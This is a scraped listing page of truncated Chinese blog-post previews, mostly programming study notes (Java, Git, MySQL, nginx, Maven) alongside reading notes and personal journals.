    • Java学习笔记01 .wsy. 日常java学习笔记
      1.1Java简介Java的前身是Oak,詹姆斯·高斯林是java之父。1.2Java体系Java是一种与平台无关的语言,其源代码可以被编译成一种结构中立的中间文件(.class,字节码文件)于Java虚拟机上运行。1.2.3专有名词JDK提供编译、运行Java程序所需要的种种工具及资源。JRE是运行Java所依赖的环境的集合。JVM是一个虚构出来的计算机,通过在实际的计算机上仿真模拟各种计算机功
    • 自学黑客(网络安全)技术——2024最新 九九归二 web安全安全学习笔记网络网络安全信息安全
      01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    • 《老子》笔记19 2018-10-28 海上明月共
      第二十二章[原文]曲则全,枉则直,洼则盈,敝则新,少则得,多则惑。是以圣人抱一为天下式。不自见,故明;不自是,故彰,不自伐,故有功;不自矜,故长。夫唯不争,故天下莫能与之争。古之所谓"曲则全"者,岂虚言哉?诚全而归之。[译文]委曲便会保全,屈枉便会直伸;低洼便会充盈,陈旧便会更新;少取便会获得,贪多便会迷惑。所以有道的人坚守这一原则作为天下事理的范式,不自我表扬,反能显明;不自以为是,反能是非彰明
    • 以客户为中心的企业设计(咨询执业笔记) 觉者看世界
      以客户为中心的企业设计(咨询执业笔记)——何伏全案咨询知名专家数字经济大行其道,过剩的风险资本自由流动,股权市场日益强势,这些力量综合在一起,产生出诸多不合理的企业设计。这些事实使得企业设计的再创造越来越需要一种约束力,许多公司和投资者未能熟谙这种约束力,或者未能将其基本原理运用于具体的商业行为中,因此付出了沉重的代价。无利润区的确存在,并且已在全球蔓延,有愈演愈烈之势。它席卷了数以千计的公司,涉
    • 【Git安装及使用学习笔记】 可可西里啊 零零散散的学习笔记git学习笔记c++qt5
      Git学习笔记Git安装Git创建本地版本库以及提交文件使用Git提交代码到码云使用Git从码云拉取代码参考博客Git安装这里参考Git详细安装教程(详解Git安装过程的每一个步骤)Git创建本地版本库以及提交文件1.查看git版本信息:git--version2.设置对应用户名与邮箱地址gitconfig--globaluser.name"your_usernamegitconfig--glob
    • 读书笔记|《穆斯林的葬礼》 飞舞的微辰
      她从来也没有打算对过去的恩怨进行报偿或是惩罚,只是想把该记住的都记住,该忘却的都忘却。事业的追求,并不一定要什么头衔和称号来满足,你爱上了一种东西,愿意用全部心血去研究它,掌握它,从中得到乐趣,并且永远也不舍得丢其它,这是事业心,是比什么都重要的......人生在世,谁也管不了谁;生儿育女,不是为了父母,是为了儿女自己,各人的路,让他们自己去闯吧。七尺之躯,一抔黄土,穆斯林们一个个都离去了,什么都
    • C#学习笔记 2301_79022588 学习笔记
      一、事件派发器在C#中,事件派发器通常是指事件委托和事件处理程序的组合,用于实现一种观察者设计模式。它允许对象在状态发生变化时通知其他对象,从而实现对象之间的解耦。事件派发器的基本组成部分:事件委托(EventDelegate):事件委托是一种特殊的委托,用于封装可以被调用的方法。它定义了事件的签名,即指定了事件处理程序方法的参数和返回类型。通常,事件委托声明在事件派发器类的外部,并且使用dele
    • 遇见美好|期待越来越好的自己|复盘日记Day137 沫ma的1001页
      遇见美好|期待越来越好的自己|复盘日记Day1372021年7月21日星期三晴喜马拉雅(沫沫成长记)亲子共读:Day42阅读学习践行Day.17/21晨间日记Day.17/21昨日晚安:23:02今日早安:05:00早起:Day806❥今日运动|跑步0Km(未完成)❥今日自我成长|学习新知识1.听书+书写笔记,小花生阅读打卡2..阅读学习,听音频+写作业3.时间管理2.0线上践行,听课+写作业4.
    • D43+1组棉布+《一个人的朝圣》读书笔记 棉布家的小橘子
      前几天读了《一个人的朝圣》,感受到信念、目标对一个人是多么重要。哈罗德因为奎妮的一封告别信,步行横跨英格兰去探望她。因为有了目标和信念他才能坚持下去。而奎妮也一直在等他。一路哈罗德回忆儿子戴维,回忆自己小时候的遭遇,回忆与妻子莫琳的种种。想通了许多事情,与其说他要去拯救奎妮不如说在拯救自己。哈罗德与父母哈罗德的童年是不幸的,爸爸妈妈根本没有想当父母却生下了他。妈妈离家出走,爸爸开始找不同的阿姨,在
    • Java学习笔记04:Java_数组 JasonYangQ Javajava
      文章目录1.数组1.1数组介绍1.2数组的定义格式1.2.1第一种格式1.2.2第二种格式1.3数组的动态初始化1.3.1什么是动态初始化1.3.2动态初始化格式1.3.3动态初始化格式详解1.4数组元素访问1.4.1什么是索引1.4.2访问数组元素格式1.4.3示例代码1.5内存分配1.5.1内存概述1.5.2java中的内存分配1.9数组的静态初始化1.9.1什么是静态初始化1.9.2静态初始
    • JavaScript快速入门笔记之二(变量、常量、数据类型) eshineLau 前端开发javascript笔记前端
      JavaScript快速入门笔记之二(变量、常量、数据类型)1、变量何时使用变量:程序中的一切数据都要保存在变量中,反复使用如何使用变量:2种情况:赋值和取值赋值:2步:1.1创建变量:——声明——创建一个新的空变量语法:var变量名;强调:仅声明,未赋值的变量,默认值是undefined命名:1.不能以数字开头2.不能用保留字。3.一般采用驼峰命名1.2赋值:将数据保存到变量中语法:变量名=数据
    • 2018.1.28笔记 - 草稿 宫晓杰
      远离离电子屏幕。正常情况下,褪黑素水平会从晚上七八点开始逐渐升高,并在清晨时分逐渐下降。但休斯顿大学的一项研究显示,在夜里盯着手机屏幕会干扰这一过程,使我们更加清醒,影响体内昼夜节律。在休斯顿大学的这项研究中,在两周的实验期间,受试者按要求在入睡前三小时戴上短波光线屏蔽眼镜,结果夜间的体内褪黑素水平上升了58%。
    • 生信星球学习小组第80期 Day3笔记--ZJUSKY ZJUSKY
      Conda简介Conda是一个开源的软件包管理系统和环境管理系统,用于安装多个版本的软件包及其依赖关系,并在它们之间轻松切换。简单来说Conda就是Linux系统下的应用商店,你可以在通过Conda下载,安装很多软件。这里我们推荐miniconda,它只包含了最基本的内容,python和conda,以及相关的必须依赖项。精简的miniconda足够满足日常生信使用。下载miniconda推荐使用清
    • 第四期【践行总结】第7周—真诚 记录我的生活
      践行时间:20181022——20181028本周践行真诚:不采用任何有害的欺骗行为,想问题和说话都要公平公正。【目标】1.不背后议论人,管好自己的嘴巴。2.对待孩子也要真诚,但可以说善意的谎言。3.长养同理心,真正站在对方角度思考问题。【百日目标践行】1.看书:«让孩子像孩子那样长大»80页«活法»50页2.:点评文2个:得到精品课复盘笔记1个:怎样高效管理你的精力第2节家有俩娃系列2则3.运动
    • 【编译原理】一篇就够了——学习笔记与课程实验超详细整理 一棵___大树 编译原理学习笔记学习算法
      ⭐⭐⭐⭐⭐⭐Github主页https://github.com/A-BigTree更多学习笔记链接https://github.com/A-BigTree/college_assignment编译原理实验https://github.com/A-BigTree/college_assignment/compiler_Experiment如果可以,麻烦各位看官顺手点个star~如果文章对你有所帮助
    • blog-engine-06-pelican 静态网站生成 支持 markdown 和 reST 语法 老马啸西风 java
      拓展阅读blog-engine-01-常见博客引擎jekyll/hugo/Hexo/Pelican/Gatsby/VuePress/Nuxt.js/Middleman对比blog-engine-02-通过博客引擎jekyll构建githubpages博客实战笔记blog-engine-02-博客引擎jekyll-jekyll博客引擎介绍blog-engine-02-博客引擎jekyll-jekyl
    • 读书笔记-《如何抑制女性写作》-20210215 关七666
      性别歧视和对性别的偏见,原来不仅仅是在中国,世界各地都需要改变。女性写作被认为是不正常的,没人看,或者否则其作者身份,认为是她们身边的男性写的,亦或者是它自行完成。为什么作者需要区分性别,是男性写的就是大作,是女性写的就是造作。这本书,揭示的是过去20世纪的女性作家们面对的种种非议。
    • Java学习笔记:atomic的实现原理? 曲钟人散
      在多线程的场景中,我们需要保证数据安全,就会考虑同步的方案,通常会使用synchronized或者lock来处理,使用了synchronized意味着内核态的一次切换。这是一个很重的操作。有没有一种方式,可以比较便利的实现一些简单的数据同步,比如计数器等等。concurrent包下的atomic提供我们这么一种轻量级的数据同步的选择。classMyThreadimplementsRunnable{
    • 九月目标达成训练营 yuqiong_819a
      1设立九月微目标【9月微目标】写作商业案例笔记45个【微目标分解】公司案例40个/每天2个,上午完成。行业笔记5个。1,9月第一周科技公司主题10个,2,9月第二周消费和服务业主题12个3,9月第三周智能制造4,9月第四周其他行业【目标达成阻碍】过度思考和找资料耽误进度,陪娃容易陷入时间黑洞,【解决方法PlanB】每周工作想清楚重点,细分目标;高质量陪娃也要目标管理~每天一个故事一个游戏【非达成不
    • HttpClient 4.3与4.3版本以下版本比较 spjich javahttpclient
      网上利用java发送http请求的代码很多,一搜一大把,有的利用的是java.net.*下的HttpURLConnection,有的用httpclient,而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 httpclient又可分为 httpclient3.x httpclient4.x到httpclient4.3以下 httpclient4.3
    • Essential Studio Enterprise Edition 2015 v1新功能体验 Axiba .net
      概述:Essential Studio已全线升级至2015 v1版本了!新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件,还有其他一些控件功能升级,精彩不容错过,让我们一起来看看吧! syncfusion公司是世界领先的Windows开发组件提供商,该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本
    • [宇宙与天文]微波背景辐射值与地球温度 comsci 背景
              宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢?      如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢?   &nbs
    • lvs-server 男人50 server
      #!/bin/bash # # LVS script for VS/DR # #./etc/rc.d/init.d/functions # VIP=10.10.6.252 RIP1=10.10.6.101 RIP2=10.10.6.13 PORT=80 case $1 in start)   /sbin/ifconfig eth2:0 $VIP broadca
    • java的WebCollector爬虫框架 oloz 爬虫
      WebCollector主页: https://github.com/CrawlScript/WebCollector 下载:webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 接下来看demo package org.spider.myspider; import cn.edu.hfut.dmic.webcollector.cra
    • jQuery append 与 after 的区别 小猪猪08
      1、after函数 定义和用法: after() 方法在被选元素后插入指定的内容。 语法: $(selector).after(content) 实例: <html> <head> <script type="text/javascript" src="/jquery/jquery.js"></scr
    • mysql知识充电 香水浓 mysql
      索引 索引是在存储引擎中实现的,因此每种存储引擎的索引都不一定完全相同,并且每种存储引擎也不一定支持所有索引类型。 根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引,总索引长度至少为256字节。 大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种:BTREE和HASH,具体和表的存储引擎相关; MYISAM和InnoDB存储引擎
    • 我的架构经验系列文章索引 agevs 架构
      下面是一些个人架构上的总结,本来想只在公司内部进行共享的,因此内容写的口语化一点,也没什么图示,所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全,希望抛砖引玉,大家互相讨论。 要注意,我这些文章是一个总体的架构经验不针对具体的语言和平台,因此也不一定是适用所有的语言和平台的。 (内容是前几天写的,现附上索引)   前端架构 http://www.
    • Android so lib库远程http下载和动态注册 aijuans andorid
      一、背景      在开发Android应用程序的实现,有时候需要引入第三方so lib库,但第三方so库比较大,例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验,发现通过远程下载so文件,然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。   二、主要
    • linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法 baalwolf option
      在客户端访问subversion版本库时出现这个错误: svnserve.conf:12: Option expected 为什么会出现这个错误呢,就是因为subversion读取配置文件svnserve.conf时,无法识别有前置空格的配置文件,如### This file controls the configuration of the svnserve daemon, if you##
    • MongoDB的连接池和连接管理 BigCat2013 mongodb
      在关系型数据库中,我们总是需要关闭使用的数据库连接,不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制,如果正对此有疑惑的朋友可以看一下。 通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧,mongoDB中当我们new一个Mongo的时候,会发现它也
    • AngularJS使用Socket.IO bijian1013 JavaScriptAngularJSSocket.IO
              目前,web应用普遍被要求是实时web应用,即服务端的数据更新之后,应用能立即更新。以前使用的技术(例如polling)存在一些局限性,而且有时我们需要在客户端打开一个socket,然后进行通信。         Socket.IO(http://socket.io/)是一个非常优秀的库,它可以帮你实
    • [Maven学习笔记四]Maven依赖特性 bit1129 maven
      三个模块 为了说明问题,以用户登陆小web应用为例。通常一个web应用分为三个模块,模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web, user-service依赖于user-core user-web依赖于user-core和user-service   依赖作用范围  Maven的dependency定义
    • 【Akka一】Akka入门 bit1129 akka
      什么是Akka Message-Driven Runtime is the Foundation to Reactive Applications In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio
    • zabbix_api之perl语言写法 ronin47 zabbix_api之perl
      zabbix_api网上比较多的写法是python或curl。上次我用java--http://bossr.iteye.com/blog/2195679,这次用perl。for example: #!/usr/bin/perl use 5.010 ; use strict ; use warnings ; use JSON :: RPC :: Client ; use
    • 比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在! brotherlamp linux运维工程师linux运维工程师教程linux运维工程师视频linux运维工程师资料linux运维工程师自学
      比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在!   ----------------------------------------------------- 兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 链接:http://pan.baidu.com/s/1i3GQtGL 密码:bl65   兄弟连Lin
    • bitmap求哈密顿距离-给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y( bylijinnan java
      import java.util.Random; /** * 题目: * 给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5), * 使得他们的哈密顿距离(d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|)最大
    • map的三种遍历方法 chicony map
      package com.test; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Set; public class TestMap { public static v
    • Linux安装mysql的一些坑 chenchao051 linux
      1、mysql不建议在root用户下运行   2、出现服务启动不了,111错误,注意要用chown来赋予权限, 我在root用户下装的mysql,我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)  chown -R cc /etc/init.d/mysql
    • Sublime Text 3 配置 daizj 配置Sublime Text
      Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项:no_bold不显示粗体字,no_italic不显示斜体字,no_antialias和
    • MySQL server has gone away 问题的解决方法 dcj3sjt126com SQL Server
      MySQL server has gone away 问题解决方法,需要的朋友可以参考下。 应用程序(比如PHP)长时间的执行批量的MYSQL语句。执行一个SQL,但SQL语句过大或者语句中含有BLOB或者longblob字段。比如,图片数据的处理。都容易引起MySQL server has gone away。 今天遇到类似的情景,MySQL只是冷冷的说:MySQL server h
    • javascript/dom:固定居中效果 dcj3sjt126com JavaScript
      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&
    • 使用 Spring 2.5 注释驱动的 IoC 功能 e200702084 springbean配置管理IOCOffice
      使用 Spring 2.5 注释驱动的 IoC 功能 developerWorks 文档选项 将打印机的版面设置成横向打印模式 打印本页 将此页作为电子邮件发送 将此页作为电子邮件发送 级别: 初级 陈 雄华 ([email protected]), 技术总监, 宝宝淘网络科技有限公司 2008 年 2 月 28 日  &nb
    • MongoDB常用操作命令 geeksun mongodb
      1.   基本操作 db.AddUser(username,password)               添加用户 db.auth(usrename,password)      设置数据库连接验证 db.cloneDataBase(fromhost)    
    • php写守护进程(Daemon) hongtoushizi PHP
      转载自: http://blog.csdn.net/tengzhaorong/article/details/9764655   守护进程(Daemon)是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。   1、基本概念   &nbs
    • spring整合mybatis,关于注入Dao对象出错问题 jonsvien DAOspringbeanmybatisprototype
      今天在公司测试功能时发现一问题: 先进行代码说明: 1,controller配置了Scope="prototype"(表明每一次请求都是原子型)    @resource/@autowired service对象都可以(两种注解都可以)。 2,service 配置了Scope="prototype"(表明每一次请求都是原子型)
    • 对象关系行为模式之标识映射 home198979 PHP架构企业应用对象关系标识映射
      HELLO!架构   一、概念 identity Map:通过在映射中保存每个已经加载的对象,确保每个对象只加载一次,当要访问对象的时候,通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射,Mapper类的getFromMap方法就是实现标识映射的实现。     二、为什么要使用标识映射? 在数据源架构模式之数据映射器中 //c
    • Linux下hosts文件详解 pda158 linux
       1、主机名:   无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。   公网:IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。   局域网:每台机器都有一个主机名,用于主机与主机之间的便于区分,就可以为每台机器设置主机
    • nginx配置文件粗解 spjich javanginx
      #运行用户#user  nobody;#启动进程,通常设置成和cpu的数量相等worker_processes  2;#全局错误日志及PID文件#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  inf
    • 数学函数 w54653520 java
      public  class  S {        // 传入两个整数,进行比较,返回两个数中的最大值的方法。      public  int  get( int  num1, int  nu